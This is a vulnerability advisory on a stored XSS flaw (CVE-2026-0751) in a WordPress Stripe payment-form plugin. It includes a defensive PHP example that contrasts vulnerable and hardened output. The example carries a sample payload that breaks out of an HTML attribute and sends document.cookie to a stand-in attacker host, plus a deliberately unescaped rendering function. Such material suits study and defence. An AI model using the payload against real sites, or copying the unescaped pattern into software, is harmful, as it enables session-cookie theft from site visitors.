Payment Page | Payment Form for Stripe Vulnerability (Medium) – CVE…


Feb 13, 2026 | Plugins

Attack Vectors

Payment Page | Payment Form for Stripe (WordPress plugin slug: payment-page) has a Medium-severity vulnerability (CVSS 6.4) identified as CVE-2026-0751. It affects all versions up to and including 1.4.6.

The attack requires an authenticated WordPress account with Author-level access or higher. An attacker in that position can abuse the plugin’s pricing_plan_select_text_font_family parameter to place malicious script content into stored settings/content, which can then execute when someone visits an impacted page.

Practically, this is most relevant when multiple people (employees, contractors, agencies, partners) have content publishing permissions. If any of those accounts are compromised through phishing, password reuse, or malware, the attacker could use that access to inject persistent malicious code into pages tied to payment flows or campaign landing pages.

Security Weakness

The root issue is insufficient input sanitization and output escaping in how the plugin handles the pricing_plan_select_text_font_family parameter. That gap allows stored cross-site scripting (Stored XSS): attacker-controlled script is saved and later rendered to site visitors.

The issue is classified as stored because the injected content stays in the saved setting and executes on every page load that renders it, not just once. Because the script runs in your site's origin, it can read and alter whatever the visitor sees and submits on that page, including forms on lead-capture and payment pages.
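The pattern behind this class of bug, and the two-sided fix (validate on save, escape on output), as an added illustrative example. This is not the payment-page plugin's code: the setting name is taken from the advisory, while the rendering context (a style attribute on a select element), the function names and the sample payload are assumptions made for the demonstration.

```php
<?php
// Added illustrative example, NOT code from the payment-page plugin. The setting
// name comes from the advisory; the rendering context (a style attribute on a
// <select>), the function names and the sample payload are assumptions.

// Constructed sample of what an Author-level user might submit as
// pricing_plan_select_text_font_family. The first double quote closes the
// attribute, so everything after it is parsed as new markup.
const SAMPLE_PAYLOAD = 'Arial"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script><i x="';

// VULNERABLE pattern: no sanitization on save and no escaping on output, so the
// stored string lands in the page verbatim and the browser runs the <script>.
function render_select_vulnerable(string $font_family): string
{
    return '<select class="pricing-plan-select" style="font-family: ' . $font_family . '">'
         . '<option>Monthly</option></select>';
}

// Fix part 1 (on save): allowlist validation. A CSS font-family list needs only
// letters, digits, spaces, commas, hyphens and quotes; reject anything else.
function sanitize_font_family(string $value): ?string
{
    $value = trim($value);
    if ($value === '' || strlen($value) > 200) {
        return null;
    }
    return preg_match('/^[A-Za-z0-9 ,\'"-]+$/', $value) === 1 ? $value : null;
}

// Fix part 2 (on output): escape for the attribute context regardless of what
// was stored. Inside WordPress the usual calls are sanitize_text_field() on save
// and esc_attr() on output; plain htmlspecialchars() is used here so the file
// runs without WordPress loaded. The allowlist above is stricter than
// sanitize_text_field(), which only strips tags.
function render_select_hardened(string $font_family): string
{
    $clean   = sanitize_font_family($font_family) ?? 'inherit';
    $escaped = htmlspecialchars($clean, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<select class="pricing-plan-select" style="font-family: ' . $escaped . '">'
         . '<option>Monthly</option></select>';
}

// Check for sites that may already carry an injected value: run stored settings
// through the same allowlist and report the ones that would not pass. In a real
// audit $options would come from the plugin's saved settings; this array is
// constructed for the example (second key is an assumed, benign setting).
function find_suspicious_font_values(array $options): array
{
    $hits = [];
    foreach ($options as $name => $value) {
        if (is_string($value) && sanitize_font_family($value) === null) {
            $hits[] = $name;
        }
    }
    return $hits;
}

$options = [
    'pricing_plan_select_text_font_family' => SAMPLE_PAYLOAD,
    'pricing_plan_title_font_family'       => '"Open Sans", sans-serif',
];

echo "Vulnerable output:\n" . render_select_vulnerable(SAMPLE_PAYLOAD) . "\n\n";
echo "Hardened output, payload:\n" . render_select_hardened(SAMPLE_PAYLOAD) . "\n\n";
echo "Hardened output, benign value:\n" . render_select_hardened('"Open Sans", sans-serif') . "\n\n";
echo "Settings that fail the allowlist: " . implode(', ', find_suspicious_font_values($options)) . "\n";
```

Run with `php example.php`. The vulnerable output contains a live `<script>` element; the hardened output of the same payload falls back to `inherit` because the allowlist rejects `<`, `>` and `(`, and the benign value survives with its quotes rendered as `&quot;`, which the browser decodes back into the CSS value. The scan reports only the injected setting.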

At the time of writing, there is no known patch available. Remediation guidance from the source recommends reviewing details and applying mitigations based on your organization’s risk tolerance, which may include uninstalling the affected plugin and replacing it.

Technical or Business Impacts

Brand and revenue risk: A stored script running on payment or checkout-related pages can undermine trust at the exact moment a customer is deciding to convert. Even short-lived malicious behavior can cause abandoned checkouts, lost leads, and reputational damage that persists after cleanup.

Data exposure risk: The vulnerability’s CVSS vector indicates a scope change and low confidentiality/integrity impact (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N). In business terms, that means an attacker could potentially access or manipulate some information within the web session or page experience in ways that matter for privacy and compliance, even if it’s not a full site takeover.

Compliance and governance risk: If malicious scripts run on pages collecting customer details, it can trigger incident response requirements, internal reporting, and potential regulatory scrutiny depending on the data involved and your jurisdiction. Marketing teams may also need to pause campaigns while investigations occur, impacting pipeline and forecasts.

Operational disruption: With no known patch, mitigation may require disabling or replacing Payment Page | Payment Form for Stripe. That can affect payment workflows, landing pages, analytics, and integrations—creating coordination work across Marketing, IT, Finance, and Compliance.

Similar Attacks

Stored XSS is a common technique in real-world website compromises because it persists and silently affects every visitor to the affected page. A few well-documented examples of malicious-script attacks and payment-page targeting:

Melissa virus (1999) — an early example of malicious scripting spreading through user interactions and trusted workflows; it was a Microsoft Word macro virus that propagated by e-mailing itself to contacts in the victim's address book, not a web-page script.

Magecart attacks — widely reported campaigns where attackers inject malicious code into e-commerce sites to capture payment-related information.

CISA advisory on web skimming and related threats — guidance highlighting risks of malicious scripts on web pages that handle sensitive customer and payment interactions.
